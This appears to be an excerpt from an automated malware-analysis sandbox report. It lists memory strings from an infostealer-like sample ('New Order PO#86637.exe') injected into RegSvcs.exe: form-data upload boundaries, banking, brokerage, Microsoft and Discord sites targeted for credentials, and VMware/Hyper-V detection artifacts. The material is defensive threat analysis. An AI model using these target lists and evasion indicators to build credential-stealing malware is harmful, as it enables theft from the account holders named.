                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdab98bdf9072
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf9f7d1a9f0d8
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcda7b752d16fc
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf68d694733eb
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd091525bd2ff7<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdee3d2d3270d
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcde35e0cc7c14
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfed4e660b567
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce833a5cad7e1
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcd9c6eb4b45c9LR]q
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf98f7b2e35ed
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdb6b0f853274
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfa10ca850f14<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfc29d9a5caca
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf2cc95a004ba
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfed4e660b567<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd01771edfcbec<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce2c4fd9d50bb
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000003157000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf9f7d1a9f0d8<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdab15e90aa9c
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd065e266dc598<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdf23b64c0193
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf5efb3c6be30
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdbdd55c06625
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd0b324555a5aa<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dced6e233a01b3
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dceb3e4c93a34e
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf718b1633c98<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcd9d920235f7a
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd0417862dab04<
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdc15e6f642c6
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce4554f19dcc3
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd01e8a511992d<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000003157000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf96e2d7c1904<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: wscript.exe, 00000004.00000002.2215153509.00000151544C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf2d6cd89f323
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf0c0ffc60fd2
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce7aa69158b0e
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcda7d977e6e0c
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcd9bb28caf6f0
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf87acb7f0612
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd00d3dede440f<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdb0945efe091
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dceaac99e5fcbf
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd04a7c7a5e552<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd002a375df3af<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf048596588d7
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf0ced33ec182
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf9041216e2b7<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce64c0780910e
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf6c726581a75
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcd9f129bc3f60
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdf9ea2613703
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce72aa89fc853
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd00e934167454<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf5228736b7e4
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce1f6e390835f
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002B56000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd06cf902e9b27<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dceaff00abf50c
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf03acab5cb25
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce6e7f102d275
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcefb4e2f4aa1c
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcda4f67f6f17f
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf64364b823ab
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd053f66608f0b<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce3d56841fb19
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000003157000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfc29d9a5caca<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf5adc4041a3c
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd08864f6f4d2d<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfe505b5a8452
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf96e2d7c1904
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd015205408852<
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf718b1633c98
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcda2b6f5946f9
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf9041216e2b7
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002D44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfdfaba9eabda<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdb737b693935
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002B66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf7aab7810d9f<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcd9aa313f3835
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce27d7cd6f4d1
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F3B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfed3182d0166<
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce309cdaf4648
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcda09bce7e3ee
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.00000000027D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce4fe8cefc2ba
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.00000000037A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: RegSvcs.exe, 00000003.00000002.4535887705.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4537158733.0000000000A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfdfaba9eabda
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd0270272e694b<
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcd9999c7f3372LR]q
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dceba7d0803f2e
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd05da1ef7e562<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdc508e6a9ef6
                      Source: wscript.exe, 00000004.00000002.2215153509.00000151544C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce8b65a0f3d9f
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce1e59cb38a86
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000003186000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfe505b5a8452<
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcdaf9aed13a59
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf7aab7810d9f
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002C77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dce3488763ca5d
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf15ba97e3e5d
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: New Order PO#86637.exe, 00000000.00000002.2084776236.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: od_VMware_SATA_CD00#4&224f
                      Source: RegSvcs.exe, 00000006.00000002.4538128302.0000000002ADD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcfa10ca850f14
                      Source: RegSvcs.exe, 00000003.00000002.4537810663.0000000002D82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcf75e097196ac
                      Source: RegSvcs.exe, 00000006.00000002.4540335552.0000000003AC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
